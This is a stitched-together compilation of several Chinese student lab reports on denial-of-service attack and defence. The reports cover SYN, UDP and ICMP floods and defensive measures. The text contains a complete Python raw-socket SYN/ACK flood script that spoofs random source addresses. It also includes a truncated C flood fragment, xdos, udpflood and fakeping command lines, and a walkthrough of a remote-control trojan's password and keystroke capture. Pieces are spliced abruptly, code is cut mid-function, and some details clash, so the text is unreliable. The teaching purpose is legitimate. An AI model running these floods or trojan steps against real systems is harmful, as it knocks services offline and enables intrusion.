实验五拒绝服务攻击与防范实验报告

目录1拒接服务攻击简介 (2)2拒接服务攻击的原理 (2)2.1 SYN Flood (2)2.2 UDP洪水攻击 (4)2.3Ping洪流攻击 (5)2.4其他方式的攻击原理 (6)3攻击过程或步骤流程 (6)3.1攻击使用的工具 (6)3.2 SYN flood攻击模拟过程 (7)4此次攻击的功能或后果 (10)5对拒绝服务防范手段与措施 (10)5.1增强网络的容忍性 (10)5.2提高主机系统的或网络安全性 (11)5.3入口过滤 (11)5.4出口过滤 (11)5.5主机异常的检测 (12)6个人观点 (12)7参考文献 (12)“拒绝服务攻击”技术研究与及实现1拒接服务攻击简介所谓的拒绝服务攻击简单说即攻击者想办法让目标机器停止提供服务，是黑客常用的攻击手段之一。

其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服务攻击。

拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。

攻击者进行拒绝服务攻击，实际上让服务器实现两种效果：一是迫使服务器的缓冲区满，不接收新的请求；二是使用IP欺骗，迫使服务器把合法用户的连接复位，影响合法用户的连接。

2拒接服务攻击的原理2.1 SYN FloodSYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(Distributed Denial Of Service分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式，这种攻击容易操作并且效果明显具体过程是通过三次握手协议实现的假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。

一、实验背景随着互联网技术的飞速发展，网络安全问题日益突出。

为了提高网络安全意识，掌握网络安全防护技能，我们进行了一次网络攻击实验。

本次实验旨在了解网络攻击的基本原理，熟悉常见的网络攻击手段，以及掌握相应的防御措施。

二、实验目的1. 理解网络攻击的基本原理和常见手段。

2. 掌握网络攻击实验的基本流程。

3. 熟悉网络安全防护技术，提高网络安全意识。

三、实验环境1. 操作系统：Windows 102. 网络设备：路由器、交换机、计算机3. 实验软件：Wireshark、Nmap、Metasploit等四、实验内容1. 漏洞扫描（1）使用Nmap扫描目标主机，发现潜在的安全漏洞。

（2）分析扫描结果，了解目标主机的开放端口和服务信息。

2. 拒绝服务攻击（DoS）（1）使用Metasploit生成大量的伪造请求，对目标主机进行DoS攻击。

（2）观察目标主机响应时间，分析攻击效果。

3. 口令破解（1）使用Hydra工具尝试破解目标主机的登录口令。

（2）观察破解过程，了解口令破解的原理。

4. 恶意代码传播（1）利用网络共享传播恶意代码，感染目标主机。

（2）分析恶意代码的传播过程，了解恶意代码的特点。

5. 数据窃取（1）使用网络监听工具，窃取目标主机传输的数据。

（2）分析窃取到的数据，了解数据窃取的原理。

五、实验结果与分析1. 漏洞扫描通过Nmap扫描，我们成功发现目标主机的开放端口和服务信息，发现了一些潜在的安全漏洞。

这为我们进行后续的攻击实验提供了依据。

2. 拒绝服务攻击（DoS）我们使用Metasploit生成了大量的伪造请求，对目标主机进行了DoS攻击。

观察目标主机的响应时间，发现攻击效果明显，目标主机无法正常响应服务。

3. 口令破解我们尝试破解目标主机的登录口令，使用Hydra工具进行暴力破解。

经过一段时间，成功破解了目标主机的口令。

4. 恶意代码传播我们利用网络共享传播恶意代码，成功感染了目标主机。

一、实验目的
1.SYN洪水攻击
2.ICMP洪水攻击
二、实验内容与步骤
（1）SYN洪水攻击
对目标主机实施SYN洪水攻击的命令：nmap -v –sS -T5 靶机IP地址
（2）ICMP洪水攻击
启用实验平台ICMP洪水攻击工具
三、实验小结
SYN洪水攻击和ICMP洪水攻击尽管都能实现洪水攻击，但是二者的原理不同
1.SYN洪水攻击原理
在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发送SYN+ACK应答报文后是无法收到客户端的ACK报文的，即第三次握手无法完成，成为半连接状态。

这种情况下服务器端一般会新开一个等待线程来负责等待一段时间（SYN Timeout），而服务器里面用来存放等待线程的堆栈一般不会很大。

因此黑客可以大量模拟这种情况，使服务器忙于处理这种半连接状态，最终等待堆栈溢出
2.ICMP洪水攻击原理
a..直接Flood
源IP就是黑客自己的IP，回应ICMP发回到黑客自己
b.伪造IP的Flood
伪造源IP
c.Smurf
结合IP地址欺骗和ICMP回复的方法，使大量回应报文发向攻击目标主机，引起攻击目标系统瘫痪。

实验4：拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程，及IPv4所存在的固有缺陷。

【实验准备】准备xdos.exe拒绝服务工具。

【注意事项】实验后将DoS黑客软件从机器彻底删除，避免恶意应用影响网络运行。

【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service，简称DoS。

这种攻击行动使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。

SYN-Flood是当前最常见的一种Dos攻击方式，它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。

（1）计算机a登录到windows 2000，打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包，并启动捕捉进程。

（2）在计算机B上登录Windows 2000,打开命令提示窗口，运行xdos.exe,命令的格式：‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。

输入命令：xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击，192.168.19.42 是计算机A的地址。

（3）在A端可以看到电脑的处理速度明显下降，甚至瘫痪死机，在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。

（4）B停止攻击后，A的电脑恢复快速响应。

打开捕捉的数据包，可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包，且都是只请求不应答。

以至于A的电脑保持有大量的半开连接。

运行速度下降直至瘫痪死机，拒绝为合法的请求服务。

二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种。

(1)关闭不必要的服务。

实验10-拒绝服务攻击与防范贵州大学实验报告学院：计算机科学与技术学院专业：信息安全班级：sizeof(tcpHeader));tcpHeader.th_sum=checksum((USHORT*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));//把伪造好的IP头和 TCP 头放进 buf 准备发送memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));//发送数据包rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));if (rect==SOCKET_ERROR){printf("send error!:%x",WSAGetLastError());return false;}elseprintf("send ok!");Sleep(sleeptime); //根据自己网速的快慢确定此值，sleeptime越小发得越快}//endwhile //重新伪造IP的源地址等再次向目标发送closesocket(sock);WSACleanup();return 0;}4.运行代码得到如下可执行文件：5.攻击之前，将一台web服务器的服务端口改为1234，如下：6.访问上面的web服务器如下：7.DoS攻击：8.最后一个参数60，表示每60ms发送一次，回车后：9.每60 ms显示一个send ok！表示发送成功。

DoS攻击之后，访问之前的web服务器，出现如下情况：表明DOS攻击成功！（二）分布式服务（DDoS）攻击与防范C1（攻击者）上安装DDoS客户端程序，C2—C6（傀儡机）上安装DDoS服务器端，C7(被攻击者)上安装启用冰盾DDoS防火墙，C8(被攻击者)上不使用防火墙。

信息安全与管理专业实训报告学生姓名：一、实训名称：拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境：ubuntu/kali +python 2.7.11使用方法如下：mode有三种模式syn攻击、ack攻击、混合攻击，虽说是支持多线程但是多个线程反而不如单线程快，估计是我的多线程弄得有些问题，麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧，因为只是测试用我也没带tcp的options字段，报文长度也不够64字节，不过也能传到目的地址。

下面是代码：#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads："))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境：ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法：支持两个参数目的ip和目的端口性能：限制发包速度的是带宽（我这是100M的网，除去报文的前导码和帧间隔极限速度差不多就是9m左右了），cpu利用才27%，我在1000Mbps的网速下测试，单线程的话速度能到40m左右，cpu占用率大约85%左右。

网络安全测试中的拒绝服务攻击与防范网络安全在当今信息时代的重要性不言而喻，随着科技的快速发展，人们越来越依赖于网络进行各种活动。

然而，网络的普及也带来了一系列的安全威胁，其中之一就是拒绝服务攻击（Denial of Service，DoS）。

本文将探讨网络安全测试中的拒绝服务攻击与防范方法。

一、拒绝服务攻击的定义与原理拒绝服务攻击是指攻击者通过发送大量的请求，占用目标系统的全部或部分资源，导致合法用户无法正常访问该系统的情况。

攻击者通过消耗目标系统的带宽、计算资源或存储资源等方式，造成系统负载过高而无法响应合法用户的请求。

拒绝服务攻击的原理在于攻击者通过发送大量的恶意请求，耗尽目标系统的资源，从而引发系统崩溃或运行缓慢。

常见的拒绝服务攻击手段包括：泛洪攻击（Flood Attack）、碎片攻击（Fragmentation Attack）、应用层攻击（Application Layer Attack）等。

二、拒绝服务攻击的影响拒绝服务攻击给目标系统带来了严重的影响，其中包括以下几个方面：1. 网站瘫痪：拒绝服务攻击会导致目标网站无法正常运行，用户无法访问网站，给网站运营者带来巨大的经济损失。

2. 数据泄露：攻击者利用拒绝服务攻击的机会，可能获取并窃取系统中的重要数据，给用户和机构带来隐私泄露的风险。

3. 声誉受损：拒绝服务攻击会导致目标系统长时间不可用，使得用户对该系统的可靠性和稳定性产生质疑，进而对企业的声誉造成损害。

三、拒绝服务攻击的防范方法为了保护系统免受拒绝服务攻击的影响，需要采取一系列的防范措施。

下面是几种常见的防范方法：1. 增加带宽：通过增加带宽的方式，可以提高系统对大规模攻击的抵御能力。

这样系统能够更快地缓解攻击期间的负载压力。

2. 流量过滤：利用防火墙、入侵检测系统（IDS）等安全设备对流量进行过滤和识别，屏蔽恶意流量和异常请求，过滤掉拒绝服务攻击。

3. 负载均衡：通过负载均衡技术，将流量分散到多台服务器上，分摊压力，提高系统的稳定性和可靠性，从而减轻拒绝服务攻击的影响。

华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级：网络学生姓名：
学号：成绩：
指导教师：曹锦纲实验日期：
3、此时打开百度页面，可以看到能抓到所有发给PC2的ip数据包。

4、在PC1上打开XDos.exe，命令的格式为：xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。

输入命令：xdos 192.168.137.3 80 -t 200 -s*，回车即可攻击，192.168.137.3是PC2的IP地址。

5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。

且能通过捕捉到的数据包看到都是只请求不应答，以至于PC2保持有大量的半开连接。

6、停止攻击后，PC2不再接收到数据包。

五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种：
（1）关闭不必要的服务。

（2）限制同时打开的Syn半连接数目。

（3）缩短Syn半连接的time out时间。

（4）及时更新系统补丁.
六、实验心得与体会。

一、实验目的1. 理解网络攻防的基本概念和原理。

2. 掌握常见网络攻击手段和防御方法。

3. 增强网络安全意识和自我保护能力。

二、实验环境1. 操作系统：Windows 102. 网络设备：路由器、交换机、计算机3. 实验工具：Wireshark、Nmap、Hydra、Metasploit等三、实验内容1. 网络扫描与侦察（1）使用Nmap扫描目标主机的开放端口，分析目标主机可能存在的安全漏洞。

（2）使用Wireshark捕获网络数据包，分析网络流量，寻找攻击线索。

2. 口令破解与远程重放攻击（1）使用Hydra工具破解目标主机的弱口令。

（2）使用Metasploit框架进行远程重放攻击，模拟攻击者的行为。

3. 拒绝服务攻击与防御（1）使用Metasploit框架模拟SYN洪水攻击，测试目标主机的防御能力。

（2）分析目标主机的防火墙策略，寻找防御漏洞。

4. 漏洞利用与木马攻防（1）使用Metasploit框架利用目标主机存在的漏洞，获取远程控制权限。

（2）分析木马程序的行为特征，制定相应的防御策略。

5. Web攻防（1）使用Burp Suite等工具进行Web漏洞扫描，寻找目标网站的安全漏洞。

（2）模拟SQL注入、XSS等攻击，测试目标网站的防御能力。

6. 入侵检测与防护（1）使用Snort入侵检测系统对网络流量进行实时监控，识别恶意攻击。

（2）分析入侵检测日志，制定相应的防御策略。

四、实验步骤1. 网络扫描与侦察（1）启动Nmap，设置扫描参数，扫描目标主机的开放端口。

（2）启动Wireshark，选择合适的接口，开始捕获网络数据包。

2. 口令破解与远程重放攻击（1）启动Hydra，设置破解参数，开始破解目标主机的弱口令。

（2）启动Metasploit，选择相应的攻击模块，进行远程重放攻击。

3. 拒绝服务攻击与防御（1）启动Metasploit，选择SYN洪水攻击模块，设置攻击参数。

（2）分析目标主机的防火墙策略，寻找防御漏洞。

第1篇一、实验目的本次实验旨在通过模拟攻击场景，了解并掌握常见的网络安全攻击手段，提高对信息安全的认识，增强网络安全防护能力。

二、实验环境1. 操作系统：Windows 102. 网络环境：局域网内3. 实验工具：Wireshark、Metasploit、Nmap等三、实验内容本次实验主要分为以下几个部分：1. 网络嗅探2. 端口扫描3. 弱口令攻击4. SQL注入攻击5. 钓鱼攻击四、实验步骤1. 网络嗅探（1）使用Wireshark工具进行网络嗅探，捕捉局域网内的数据包。

（2）分析捕获到的数据包，了解网络流量情况，识别可能的攻击行为。

2. 端口扫描（1）使用Nmap工具对目标主机进行端口扫描。

（2）分析扫描结果，找出目标主机开放的端口，了解其可能存在的安全风险。

3. 弱口令攻击（1）使用Metasploit工具尝试破解目标主机的弱口令。

（2）分析破解过程，了解弱口令攻击的原理和防范措施。

4. SQL注入攻击（1）构建一个存在SQL注入漏洞的实验环境。

（2）使用SQL注入工具对实验环境进行攻击，获取数据库权限。

（3）分析SQL注入攻击的原理和防范措施。

5. 钓鱼攻击（1）制作一个伪装成正规网站的钓鱼页面。

（2）使用钓鱼攻击工具向目标用户发送钓鱼邮件。

（3）分析钓鱼攻击的原理和防范措施。

五、实验结果与分析1. 网络嗅探通过Wireshark捕获到的数据包，我们发现局域网内存在大量的网络流量，包括HTTP、FTP、SMTP等协议的数据包。

这些数据包中可能包含敏感信息，如用户名、密码等。

2. 端口扫描使用Nmap扫描目标主机，发现其开放了22、80、3306等端口。

其中，22端口为SSH远程登录端口，80端口为HTTP网页访问端口，3306端口为MySQL数据库端口。

这些端口可能存在安全风险，需要加强防护。

3. 弱口令攻击使用Metasploit破解目标主机的弱口令，成功获取了目标主机的控制权限。

这表明，在实际应用中，用户应设置强口令，并定期更换密码，以降低弱口令攻击的风险。

实验报告课程名称：网络安全维护与管理实验项目名称：拒绝服务攻击与防范学生姓名：专业：计算机网络技术学号：同组学生姓名：实验地点：实验日期：2012 年10 月9 日一、实验目的及要求了解黑客攻击的手段及步骤，掌握拒绝服务攻击的防范方法二、实验的内容及原理应用xdos模拟拒绝服务攻击，通过Sniffer监视网络的状态、数据流动情况并辨析攻击前后的数据变化情况，并进行适当的防御。

三、实验的环境1、网络环境：校园局域网中实训用计算机，计算机配置为……2、软件：VMware 5.3 及Windows Server 2003的虚拟机；3、Sniffer的安装软件。

4、IP为192.168.10.13进行攻击IP为192.168.10.18的计算机。

四、实验方法和步骤1、打开虚拟机，配置网络为192.168.18.13 ，计算机名为zss。

网络为192.168.18.18的计算机名为km.2、在计算机名为km的计算机上安装Sniffer软件。

（1）打开安装软件。

如图1图1（2）单击下一步。

如图2图2（3）依次选择下一步，到是否同意协议时选择是。

如图3图3（4）填写名字和公司，可随意填写。

如图4图4（5）选择安装路径，单击下一步。

如图5图5（6）软件进行安装。

如图6图6（7）填写名称、地址等，可随意填写。

如图7、图8、图9图7图8图9（8）选中NOT.....复选框，单击下一步。

如图10图10（9）单击完成按钮。

如图11图11（10）单击确定按钮。

如图12图12（11）单击完成按钮完成Sniffer软件的安装。

如图13图133、用计算机名为ZSS的计算机ping IP192.168.18.18可以ping通。

如图14图144、用计算机名为km的Sniffer软件对计算机进行检测，发现CPU的占用很少。

如图15图155、用IP为192.168.18.13的计算机向IP为192.168.18.18的计算机发送大量的数据包，进行攻击。

网络攻防对抗实验报告实验名称：拒绝服务攻击（实验五）指导教师：专业班级：姓名：学号： ______电子邮件：___ 实验地点：实验日期：实验成绩：____________________一、实验目的1. 通过练习使用DoS／DDoS攻击工具对目标主机进行攻击；2．理解DoS／DDoS攻击的原理及其实施过程；3．掌握检测和防范DoS／DDoS攻击的措施。

二、实验原理1. 拒绝服务（DoS）攻击这是一种非常有效的攻击技术，它利用协议或系统的缺陷，采用欺骗的策略进行网络攻击，最终目的是使目标主机因为资源全部被占用而不能处理合法用户提出的请求，即对外表现为拒绝提供服务。

有几种常见的DoS攻击方法：(1)Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN 包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。

(2)Land-based：攻击者将一个包的源地址和目的地址都设置为目标主机的地址，然后将该包通过IP欺骗的方式发送给被攻击主机，被攻击主机与自己建立空连接并保留连接，从而很大程度地降低了系统性能。

(3)洪水(UDP flood) ：echo服务会显示接收到的每一个数据包，而chargen服务会在收到每一个数据包时随机反馈一些字符。

UDP flood 假冒攻击就是利用这两个简单的TCP/IP 服务的漏洞进行恶意攻击，通过伪造与某一主机的Chargen服务之间的一次的UDP 连接，回复地址指向开着Echo 服务的一台主机，通过将Chargen和Echo服务互指，来回传送毫无用处且占满带宽的垃圾数据，在两台主机之间生成足够多的无用数据流，这一拒绝服务攻击飞快地导致网络可用带宽耗尽。

(4)Smurf、UDP-Flood、Teardrop、PingSweep、Pingflood、Ping of Death2. DDoS的原理分布式拒绝服务（DDoS）是基于DoS攻击的一种特殊形式。

实验五报告课程名称计算机网络安全实验成绩实验名称拒绝服务攻击与防范实验学号姓名班级日期课程设计报告一、实验目的及要求：1.实验目的通过本实验对DoS/DDoS攻击的深入介绍和实验操作；了解DoS/DDoS攻击的原理和危害，并且具体掌握利用TCP、UDP、ICMP等协议的DoS/DDoS 攻击原理；了解针对DoS/DDoS攻击的防范措施和手段。

通过实验掌握DoS/DDoS攻击的原理；2.实验要求(1)使用拒绝服务攻击工具对另一台主机进行攻击。

(2)启动进行抓包工具，并分析TCP、UDP、ICMP等协议的DoS/DDoS攻击原理与危害。

(3)给出针对DoS/DDoS攻击的防范措施和手段。

二、实验过程及要点：实验过程:攻击机（192.168.13.33）目标机（192.168.13.22）原理：SYN攻击属于DOS攻击的一种，它利用TCP协议缺陷，通过发送大量的半连接请求，耗费CPU和内存资源。

此次模拟攻击为虚拟大量IP与目标建立不完整三次握手连接。

SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake)，而SYN Flood拒绝服务攻击就是通过三次握手而实现的。

(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文，SYN(Synchronize)即同步报文。

同步报文会指明客户端使用的端口以及TCP连接的初始序号。

这时同被攻击服务器建立了第一次握手。

(2) 受害服务器在收到攻击者的SYN报文后，将返回一个SYN+ACK的报文，表示攻击者的请求被接受，同时TCP序号被加一，ACK(Acknowledgment)即确认，这样就同被攻击服务器建立了第二次握手。

(3) 攻击者也返回一个确认报文ACK给受害服务器，同样TCP序列号被加一，到此一个TCP连接完成，三次握手完成。

具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。

4. 检查Server状态。

发动攻击前，为了保证Server的有效，我们最好对它来次握手应答过程，把没用的Server踢出去，点击“检查状态”按钮，Client
列表来次扫描检查，最后会生成一个报告，看：
5. 清理无效主机
点“切换”按钮进入无效主机列表，用“清理主机”按钮把无效的废机踢出去，再按一次“切换”转回主机列表。

7. 攻击
经过前面的检测，我们现在可以发动攻击了。

SYN攻击：源IP乱填（要遵守IP协议），目标IP填你要攻击的IP或域名，源端口0---65535随便一个，目标端口：80--攻击HTTP，21--攻击FTP，23--攻击Telnet，25/110--攻击E-MAIL，8000--攻击腾讯
8. 对方机器的cpu占用率如图所示：
证明攻击成功，但攻击完事之后，一定要记得停止攻击。

实验完毕，关闭虚拟机和所有窗口。

拒绝服务器攻击事件处理实验报告《拒绝服务器攻击事件处理》实验报告学院：信息工程学院姓名：褚芳芳班级：计应1101班学号：0401110336拒绝服务攻击及攻击者想办法让目标机器停止服务或资源访问，是黑客常用的攻击手段之一。

这些资源包括磁盘空间、内存条、进程甚至网络宽带，从而阻止正常用户的访问。

其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一部分，只要能对目标造成麻烦，使某些服务器被暂停甚至主机死机，都属于拒绝服务攻击。

拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。

实验目的：通过学习使用简单的发包工具模拟发包，检查目标主机的网络情况，了解拒绝服务攻击的一般特征及相关处理措施。

【使用udpflood.exe程序发送udp包攻击实验服务器】1、获取工具压缩后，将包解压并运行其中的udpflood.exe文件：2、在上图所示的界面中输入下列数据：→IP/hostname处输入实验服务器的IP地址→Port出输入445→M ax duration（secs）输入900→在speed的位置选择max （LAN）→然后点击go开始发包。

3、打开天网防火墙界面，点击日志标签：4、在天网防火墙的日志中可以查看到大量的来自同一个IP（请记下该IP，做后面的规则添加用）的udp包，本机端口是445，并且该包是允许通行的：6、在本机点击udpflood程序界面上的stop，停止发包，但是不要关闭该程序【设置防火墙规则禁止udp包通过】1、点击天网防火墙的IP规则管理标签，打开IP规则管理界面，然后点击增加规则图标：2、在增加IP规则界面中输入下列数据：→名称处输入一个名称，如：deny udp→数据包方向：选接受即可→对方IP地址处：选择指定地址，然后在ip处填入刚才在日志中看到的ip地址。

→数据包协议类型：选择udp→在当满足上述条件处：选择拦截，并在记录和告警处打勾。

实验五：网络攻击与防范实验一、实验目的1、了解常见的木马程序进行远程控制的使用方法，掌握木马传播和运行的机制；2、掌握防范木马、检测木马以及手动删除木马的方法；二、实验环境1. Windows操作系统，局域网环境，“冰河”、“灰鸽子”木马实验软件。

2. 实验每两个学生为一组：互相进行攻击或防范。

三、实验内容练习“冰河”木马的攻击与防范四、实验步骤任务一：练习“冰河”木马的攻击与防范“冰河”木马采用木马的传统连接技术，包含两个文件：G_Client.exe和G_Server.exe。

G_Client.exe是监控端执行程序，可以用于监控远程计算机和配置服务器，G_Server.exe是被监控端后台监控程序。

打开控制端，弹出“冰河”主界面。

文件管理器对文件操作提供了下列鼠标操作功能：1. 文件上传：右键单击欲上传的文件，选择'复制'，在目的目录中粘贴即可。

也可以在目的目录中选择'文件上传自'，并选定欲上传的文件；2. 文件下载：右键单击欲下载的文件，选择'复制'，在目的目录中粘贴即可。

也可以在选定欲下载的文件后选择'文件下载至'，并选定目的目录及文件名；3. 打开远程或本地文件：选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开'，对于可执行文件若选择了'远程打开'，可以进一步设置文件的运行方式和运行参数(运行参数可为空)；4. 删除文件或目录：选定欲删除的文件或目录，在弹出菜单中选择'删除'；5. 新建目录：在弹出菜单中选择'新建文件夹'并输入目录名即可；6. 文件查找：选定查找路径,在弹出菜单中选择'文件查找'，并输入文件名即可(支持通配符)；7. 拷贝整个目录(只限于被监控端本机)：选定源目录并复制，选定目的目录并粘贴即可。

.. 单击“命令控制台”按钮，冰河的核心部分就在这里，点击“口令类命令”选择“系统信息及口令”项，点击“系统信息与口令”，得到下图所示的信息命令控制台主要命令:1. 口令类命令: 系统信息及口令、历史口令、击键记录；2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控制(如'锁定注册表'等)；3. 网络类命令: 创建共享、删除共享、查看网络信息；4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开(对于可执行文件则相当于创建进程)；5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名；6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。

实验内容与步骤：<SYN攻击实验>【实验步骤】一、登录到Windows实验台中登录到Windows实验台，并从实验工具箱取得syn攻击工具XDoc。

二、Windows实验台cmd下运行xdos攻击工具Xdos运行界面如图所示。

Xdos命令举例演示如下：xdos 192.168.1.43 139 –t 3 –s 55.55.55.55172.20.1.19 为被攻击主机的ip地址（实验时请以被攻击主机真实ip为准）139为连接端口-t 3 表示开启的进程-s 后跟的ip地址为syn数据包伪装的源地址的起始地址图1运行显示如图，Windows实验台正在对本地发送syn数据包。

图2在目标主机使用wireshark抓包，如图所示，可以看到大量的syn向172.20.1.19主机发送，并且将源地址改为55.55.55.55后面的ip地址。

图3三、本地主机状态在目标主机使用命令netstat -an查看当前端口状态，如图所示，就会发现大量的syn_received状态的连接，表示172.20.1.19主机接受到syn数据包，但并未受到ack确认数据包，即tcp三次握手的第三个数据包。

图4 查看本地网络状态当多台主机对一台服务器同时进行syn攻击，服务器的运行速度将变得非常缓慢。

<ICMP攻击实验>【实验步骤】(1)启动fakeping从实验箱取得fakeping工具，在本地主机上启动fakeping，如图所示；图5Fakeping使用如下：Fakeping 伪装的源地址(即被攻击主机地址) 目的地址（除本机地址和伪装源地址以外，可以ping通伪装源地址的主机地址）数据包大小举例演示：fakeping 172.20.3.43 172.20.1.7 100在本地主机向172.20.1.7 发送伪装icmp请求信息，请求信息的伪装源地址为172.20.3.43。

如图所示。

图6 攻击过程(2)监听本地主机（172.20.1.7）上的icmp数据包，启动wireshark抓包工具，并设置数据包过滤器为“icmp”：图7图8如图所示，并未收到相应的icmp响应数据包及icmp reply。